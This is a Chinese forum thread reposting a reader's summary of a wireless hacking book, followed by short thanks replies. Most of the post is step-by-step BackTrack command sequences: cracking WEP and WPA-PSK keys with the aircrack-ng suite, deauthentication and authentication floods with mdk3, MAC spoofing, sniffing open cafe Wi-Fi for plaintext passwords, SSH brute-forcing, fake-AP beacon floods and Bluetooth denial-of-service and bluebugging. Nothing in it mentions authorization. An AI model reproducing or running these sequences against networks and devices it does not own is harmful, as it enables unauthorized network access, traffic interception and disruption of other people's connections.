搜索
格西欧解决方案
如意云路由器
查看: 8860|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
$ k3 ]% M( F, G, h0 `. H- h9 V
* q, D3 E& K# N& y4 m" K0 i7 v以下所有操作均在BackTrack 4中进行。
( v7 {# @! o. Q$ M  n, w( D1 }. c2 s5 i$ J' a, H! d
. m9 P9 S- m  d6 W* }& V
无线WEP加密P解:
& `1 T1 C" U- c
* x/ a5 w" y/ |: s" {注入P解:
+ Y4 H8 J) I' B0 T# s6 ~/ O  d- n* w
ifconfig
6 `; h) j* S5 v5 r( m; C; w: q$ x5 g  F0 ]- ?% \
ifconfig –a( n! v6 P, e. P5 K, m

) o# ]/ D9 O* y7 Cifconfig wlan0(无线网卡) up
2 \' P$ y% q- W) ]9 i) u4 c, O$ U8 K0 X
airmon-ng start wlan0  X& j  c1 J- b9 ^6 I, e$ `
! n# F3 T# @) C2 m
airodump-ng mon02 M' c; i, |2 V3 X4 s

  T$ f, x7 ?( T8 mairodump-ng --ivs –w ivsfile –c 频道 mon0或' `7 f0 q/ q. I& z4 a- m$ c

4 m) V' a" [1 j' D5 Hairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
; j7 {0 y' }. ]6 Q( j1 M3 p
8 B  j3 h' |/ V$ qaireplay-ng -3 –b BSSID –h Station mon0
6 U1 s  {) U4 `% Q" ]4 [# g$ J- ?- A$ x% e4 b1 M5 m
aircrack-ng ivsfile-01.ivs
# v3 B8 q- X0 f$ n
+ |6 p$ [3 a2 B4 g- N5 b. Q$ d, O虚连接P解(适用于无客户端连接APP解)
8 T4 j+ r7 C7 r0 m' e3 \+ j$ w! N8 o# R& J# ]% l
ifconfig
% O) s- _$ K+ W; `% G. q. E! A' ]$ P/ E6 b' \
ifconfig –a3 s. }; a7 @! B# V7 W5 T& {

2 a  G+ U' [& E' @7 j+ Y9 P7 Z5 k) M2 \ifconfig wlan0(无线网卡) up
: h) D* D, y  ~1 m# r# g
+ @5 I  i" _$ c3 b! h2 Eairmon-ng start wlan0  M! s( P- @& N- ]- ?
5 _+ x0 w; q$ |
airodump-ng mon0" p) _* X9 _8 J$ ~$ [$ Z( f) Y! q& ?

7 k/ h" |% R+ \: [2 K% h% gairodump-ng --ivs –w ivsfile –c 频道 mon0或
5 y7 x6 A; `: T* l# w: A& L1 ^6 t# @: G, W% f
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
9 n6 |0 _  z! f) o5 a; @) O
$ t7 j7 k! v8 O9 j& g' B! e: faireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
" h+ U# N* U/ _8 k* q5 a
0 p$ [; v, j5 A9 V4 T0 q1 {& _aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
/ ~5 n1 ]7 t+ S% y( A+ `- d# W# Y3 J5 N( k$ Z0 S
aircrack-ng ivsfile-01.ivs+ {# S! i4 U! ?! p
. }# w% _% L$ z* j* ^3 x  K

0 i6 F& O3 B5 Z还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。& H+ v0 Q' z5 q, x

& T. q7 a. m; Q' Q% W- I: }: F* v0 a( S. |# K: }! Q
WPA-PSKP解
& [6 @4 \) h! M8 e
9 O% s) H; O) vifconfig% P+ K1 P# o5 w6 [& `9 Y6 k

  s5 \5 D! @( F. m: }8 [ifconfig –a+ w! j/ x( r! Y- L6 p& ?. B0 @; ~

' L5 x5 _' C$ `& h; ^ifconfig wlan0(无线网卡) up: f* y* |4 j" O6 ^5 w- [8 Z

' r: n: w: p' S7 e) [airmon-ng start wlan0
8 S: N6 B% p: p5 r
! K6 Y. h9 x* Q5 L: Eairodump-ng mon0  }& l8 A( S, q4 w6 V

8 O' h5 _: f, T3 S" Bairodump-ng –w capfile –c 频道 mon0
2 M8 O  i5 i1 n  z1 h, U
. a$ k$ a! {  f' m! R. vaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包+ V# S) F8 |8 c( m0 l
$ K7 D5 s4 D9 A' z
aircrack-ng –w Dic capfile-01.cap或% L3 L0 D3 x2 ?7 v. W
6 T& o/ N, A! B( T. R1 H. \6 s
cowpatty –f Dic –r capfile-01.cap –s SSID
2 n# E- Z0 U% R" d: h/ H
4 W) V0 F. m8 f! H- S3 ~cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID, e( t3 J" I: C/ [

/ Y0 f  ~8 F4 g7 R8 c傻瓜式P解软件SpoonWPA。' E  {9 Y6 W' S% \0 {/ V- E0 L
: x5 c, Q4 R# \/ Z
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst* i8 w$ O3 y3 @3 s# f: z, O
/ I* B0 a6 ], V) e

, B" S9 c% ~, k9 U2 o字典文件的生成和上传/ G) y4 D( ^5 C- y% l8 b! R, @

" e8 Z* M" f: N( y. b4 f$ Z8 ^- z在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。6 h7 o) o  C; h3 @6 i

# ^: ]/ _1 k, Z/ c% U, {. ?$ O3 v$ n: S  p+ p, r" t9 C
BT4下开启Tftp:Services—TFTPD—start TFTPD# i3 M/ L) G/ ]- @; n: ^) M  y
, a# s1 o8 H0 L' u: a
在Windows的CMD中运行 tftp –i IP put **.dic$ g. r& Z) T. Z  h
% x2 P9 j  Q# T" ^/ T' ?" o
0 T$ M: x) R* P( a0 v5 w# T7 ~
BT4下开启SSH:Services—SSH—start SSH: }% j) O3 m; v- p- C
3 w  H% z- ~8 k, K
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
$ M" q. y9 L: D" S. f8 A
* U  |# t. [5 s- k/ r* x  ~6 G4 }/ Y: I3 B
AP限制MAC时的解决
1 z, \! o  w( p0 r7 N
, j8 T6 g/ o. v; }9 [8 q当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:% S! L) g/ W& i8 X" o9 u
/ h( r9 H- f9 W" }1 g) g: z
ifconfig wlan0 hw ether NewMAC
$ g4 M1 l$ j% H+ d* F
  Y9 G' j1 V- o8 L5 B
+ K( I7 ?/ y+ m6 \, C9 r$ ~关闭SSID广播的AP探测:. F! m& {8 n  Z& f8 P5 C
7 \" \' T) P/ H( c6 W. N
1.     Deauth攻击:# f8 X) W& v$ c8 X  M1 a* x

, L2 V7 U" w) K7 zairodump-ng mon0
- a1 u8 l* n4 z6 ?1 B- i$ X2 U& E5 {* [! R7 ^
aireplay-ng -0 10 –a BSSID –h Station mon0+ B2 s/ a/ i9 [5 l+ n$ ^
4 o' ~9 a0 Z- C) n2 j" }/ j" \
2.     抓包分析
0 v- l+ U# m8 {0 w; r7 b6 d/ [3 A$ M
Omnipeek
' g+ M4 y8 V) P$ w8 ?
, R6 L6 ^. S- y" i2 Z; C  q2 fTcpdump –n –e –vvv –i 网卡名/ b  T; `) @5 ]# v

1 X: M" m( g" k+ J8 `$ F% M3.     暴力P解3 R) B, J- O& P# E- h9 X

' T+ w4 x5 T1 iCharon 1.1暴力P解
. K$ X" a4 K1 t8 F8 {
( @# M5 c' T/ z( [. z5 J2 r3 B' s
9 s* b- l& X7 F无线加密数据包的解密
4 Y  t( C( _6 d" t& ]& @2 v
2 c- m% P/ f$ d9 D$ p3 x  @" o
0 L6 c$ B3 S9 }5 v' y使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
! y* S9 ^6 L: a0 {  {1 R. r! K
FilterNS     DNS解析数据包" s9 }5 w% ~+ H- y' h" m; w9 t

$ ^. A2 y9 |, bFilter:HTTP    WEB访问数据包" q( X) J$ W' z; x0 t. a
* Z/ Y) R- G% B0 C
Filter:msnms   MSN
! U' ]+ [! V# B; ?- p' c4 B4 x
9 x- i; X* o7 _( V; iCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
( J3 u3 |1 |: ?  E# a
3 v% z* |. I: a/ Z8 n0 e使用airdecap-ng解密:
6 T* E4 A6 \# u$ z8 l1 P) F
/ h: k- V- B, L( aAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap5 h, r8 e: G/ T% K' ^/ g

1 `) t6 R& Y; e" M5 o/ m) f* Z" f/ Z* K6 C( |: o
咖啡馆中无线数据截取(开放式无加密AP), _2 `  l& K# t

9 u( v+ [- ?2 W+ W1.Airodump-ng –w data –c频道 mon0) ]7 X! {: u. u# x% [
$ b1 R9 q; h, B8 |
2.使用WireShark打开分析- ^2 h  w: p) o6 c7 F; F+ Y& A
  |4 z, f2 v# n1 j# ~

( {1 ]1 r6 I6 L, c( ]. _BT4下的渗透工具:: G2 H! S" Y0 |9 E7 c2 D6 z  B: ~
& M; ~5 \4 u  `. s/ U; B; p* S
nmap –sP IP/24        判断C段下存活的主机
$ A% e3 j4 W/ O, ^( ~' @* ]! P+ B  T
4 S# N- G! [  B/ @1 ?5 h4 e* g* ynmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
, c! z; V8 B0 o: \  |
9 i: L- i3 b' W, mnmap –vv –sV IP –p port   指定端口的详细信息。。。
) J1 n. _0 T' h4 T" |0 S2 ?4 J% n6 _3 \
namp –O IP/24    判断主机的系统版本# `/ D+ M7 @% J# y
3 }& X: w6 Z7 U. B8 q
$ I+ B8 D, m' P" E7 K8 S) h
GUI 版nmap:Zenmap 5 g' W( j$ M! h; m- a8 ]* O3 i- H

2 t2 I8 ]7 w0 Y) U+ r5 ~
0 e$ w) R- `! }1 gAmap使用:amap –B IP port# @3 s- }. y5 g* X
, s4 @# |( P; J7 t! @
Nbtscan(扫描Windows网络NetBios信息):
  j+ N! C& Q- L; ]6 a$ V+ y3 c3 {
nbtscan –v –s : IP/245 |1 u$ c7 h* t" c, k# J& M
8 I1 Y6 p" e* s  S. w) m
nbtscan –r IP) T, s# v4 |% q) @! {

2 R6 E* i/ `; e
& b! H6 b: I3 lDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.+ Y& R8 j0 z, R. |  P, b

% r8 ?8 p) _7 f# b. G: H$ _
4 B6 x- [0 c0 T- u% O. VHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
! B8 _6 W$ k# j* y' X" N- G$ Z+ Y! M# D* x: E
BruteSSH: ./bruthe.py –h IP –u Username –d Dic0 |" p# w- [! b$ @$ ^
# a- u* b9 K7 q% q: q* ?4 l. Q4 G# u
Metasploit3使用
+ v& G  @6 m2 E' K无线D.0.S( M' y2 l1 T. M8 _& e
$ n  a& F: A- y* X! G! s

+ ?8 u. v  K, j; pAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
7 I' P5 H4 l4 M! y. ~8 Y) d) K/ h% v) ~$ M4 I) j
airmon-ng start wlan0
+ E( W: }+ H2 Q, C! g& K+ U+ d# T0 l- N
airodump-ng mon0' w5 Y  ]6 f/ h" O
6 o& m5 u8 @; }8 |# z) Z9 d4 p
mdk3 mon0 a –a BSSID4 n9 L8 c$ K: v( Y9 k7 }) b8 n+ W
8 F! Z4 ^, ?2 N$ X
对所有的AP攻击:mdk3 mon0 a( O& o5 r4 _& e; z8 c' W) C
/ ^- _# F3 K+ r8 l2 Y+ J
4 x) S, ?+ @  q" V- Q5 ?( B4 a2 w
Deauth Flood 攻击
; j9 K4 F1 Y9 P4 H
; Z9 \' f1 x$ p; x: Amdk3 mon0 d –c Channel
+ L* L' w8 J8 g) L. P% c0 D2 E7 ]8 @' |# y* m
图形化D.O.S攻击:Charon
. V# z! n+ }% O4 \* R  c* y/ K+ S; }/ X, E/ N

' C4 \9 v9 B; @当受到攻击时,使用Wireshark抓包可以看到异常信息。
* ]# D3 x8 a5 @
! D8 Z+ L. O3 ~- S
2 O  H! S' c$ }6 m2 L! s$ m) |WPA-PSK高速P解) y$ I7 a  X: y3 u9 s

9 U4 B% y& Y% a( ?. F6 F8 X1.       WPA-PSK PMK Hash TablesP解
0 d) L' B( I9 @7 C
+ c" G: s# x& h% a6 ^0 [& Y7 _( XCowpatty –d HashTable.hash –r ***.cap –s SSID2 N# U/ m4 c: C8 L2 T* _. _

9 F" w# D+ L$ D" v; |/ EHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
* S  X$ O2 C, a1 w5 I0 [9 F, i+ |2 N2 K* U7 @5 U  C
2.       GPU辅助高速P解, V( V& f' S9 b0 U
5 {1 A  [% M' Q# _, Q$ d
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
. `/ n; k- x. t" h& K- }& }& s% k: `0 A6 ^; }, Z
3.       分布式P解
* j# i! O! G' H6 L3 d$ Y$ e) S, Y& M9 C- _0 {) I
& M5 J3 [6 l; L' L$ K. y
AP的伪造
7 ~6 L: ~! @7 K2 t3 ]( E4 ]" e5 @5 n: F4 ~
把AP的MAC改成目标AP的MAC. w( Y- w3 m7 _' F, C6 U. X; C; B. ~

' {$ F- f- K  F* B# }+ @网卡软AP- p2 x& x/ F% V7 \# B" D

! O# R; g- i; z9 ^, Q& y& M8 o9 w" |
伪造大量虚假AP信号:
9 n. R! N. c6 B0 A. f5 ]/ Q$ q
' V: A7 Y+ D" v  F随机SSID:mdk3 mon0 b –g –c 频道 : _$ K" w: p: b& \8 Z0 `
4 J3 T6 _9 b- W* _
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度6 A8 r5 e( `9 H1 K

% I, p/ c8 w5 \/ c9 G8 _: f" n+ K  t2 e# n* D; c" Z
War-Driving; h! G4 W5 Q5 I0 n; K
" H/ w0 X( F! s) H) m, u
热点地图绘制
- z' Y6 m" n. g# f4 K7 S8 X
/ ^% `& A: N! m& }) o) sWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
5 \5 q/ ^$ |" h$ k* o& |6 |1 Q9 f: ~- U, r

& s1 ~, M2 ?) [3 c9 eNetstumble1 _( s, g1 O- l: v' I( y4 o7 Z
9 U1 |5 P9 I' h8 e+ e2 l
" Z( |! w6 H. T! }# I
蓝牙Hacking7 y+ u1 Q7 D: m% x3 V

& w  y" P) x2 v- m3 EWindows下的Blue Soleil工具# G2 m& m# K% S, u

% r* r4 Q6 ^  XBT4:
& z# G+ ~, x' o; [5 J! C+ ~8 F% {  S) C5 a
hciconfig 查看蓝牙适配器+ f0 j3 \' k2 n
$ z, \6 D/ v% L( e$ A
hciconfig hci0 up 载入蓝牙适配器" v$ L1 Y) ]+ F% G8 ^# y; F# }

- C3 W% f; P7 N& ?% V9 J% Ahciconfig hci0 class 蓝牙适配器详细信息
4 ^2 Z( ]3 V  E1 [+ v+ h3 e$ C: T( A2 v9 y8 d6 M9 w

- ^! l* s- T1 R6 K1 w: lhcitool(扫描蓝牙)
$ j" s0 ?! s* F8 S
6 Q, @! Z2 ~& t2 e, x4 d7 M: j4 Ahcitool –i hci0 scan. D) U5 o% N* j( }7 s& I; h

/ B! Z1 D+ p! BBTscanner(扫描蓝牙)
( f( k5 m! ]# V# I% o+ `1 L% X4 A4 }- i" l0 D' g

: {/ c2 f. R; ~: r( C9 q( L蓝牙攻击:0 L0 [$ ?$ j- s: X
6 h/ f! L3 ~7 t; J6 d3 F# i- \9 q% W
BlueBugging (适用于BlueTooth V1.1的手机)/ u4 j7 }. F' D( h+ l! U7 j

2 p/ R' X2 d% S6 @& lBluebugger工具:
+ Z/ g9 I+ {* m' Y4 b; }- U7 [2 \* |5 A9 S
Bulebugger –a HD_Addr info
5 \- N4 V5 ?1 q  K- d. R9 w6 M6 j
+ R: ~- E8 }) N4 c$ s! W) i# P% d& Q& A0 F) E# y! D
BlueJacking$ x8 ?* _' J$ e  G* Z0 J: [

/ {4 h) q# I& @4 @9 ^& B$ ?) E实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。+ W. i  H! r- x

6 q% ], g7 X& r  S
8 S' J) K1 j# S$ p  ]( Q+ dHD_Addr修改:) l4 O. l2 T- @6 C! S% z
5 x2 t9 {% i5 e
Bdaddr工具
6 G2 M) K- p5 H& i" b) b) }1 |- k" K* j8 A% p0 o1 C1 o
bdaddr –i 蓝牙设备名 新HD_addr
$ ^2 ?- i+ d$ v2 b
* o) b, K4 S: q& Y& F4 N( k; a1 {6 l: S3 y0 p" a0 r: `# V! ~
蓝牙D.O.S
. A2 B# t0 ]! f$ W+ {* A; Y
# t, n: Q5 |# E$ J& w' a* h  al2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务; r( {5 x' e; H* w1 g# A
; M- N; W4 Z+ W4 ]
hciconfig! p5 C. `" [  e3 X6 }8 w
* Z: m) Q) z3 y$ h
hciconfig hci0 up
2 F; P. o0 }, w7 Q( ^9 K8 ^4 {' F( Z0 O0 \% w4 l
hcitool –i hci0 scan+ s% @; ^/ t, u0 k. s- B- b$ x6 w/ Z
6 A5 V* L+ R& [/ e5 |4 b
l2ping –s 10000 –目标MAC
) l9 d, u: P' f
+ [; u0 f# [5 `) Z. h* O1 r, y
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
% J& O3 z: s: q8 e: }3 R4 z
0 l, @" Z& C7 s- e  C8 Q6 [./fang –r ************-############ -s& j3 _4 F; h% r) K! t& e
" c6 ~, Q8 V9 }2 H3 ?
暴力P解************-############的蓝牙设备+ Q- S6 O7 g( m5 q+ a7 O
4 d" }  R& |- v0 S  B/ |
./fang –l 各厂商BD_Addr分配/ L; j3 D) T+ r8 a, F& u

" b) k& \5 A. s& X! P0 z( K
& G: t6 t5 {2 P, U; H9 ~- C2 hWifiZoo使用1 T% R1 S/ }/ A( ~# X3 U1 t

! ?6 f. c+ r1 R; t6 v./wifizoo.py –c Capfile, r& T6 l" S  w% x2 x

: s( m9 Y" L$ }访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1109

积分

上尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

689

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
6 {! Y4 @$ f0 g借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的2 q6 A) j* l- o. R
呵呵 其实也不贵 21块 快递再一点
$ ?( L+ L1 W  Y) i: M0 R我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-10-20 12:18 , Processed in 0.145962 second(s), 13 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表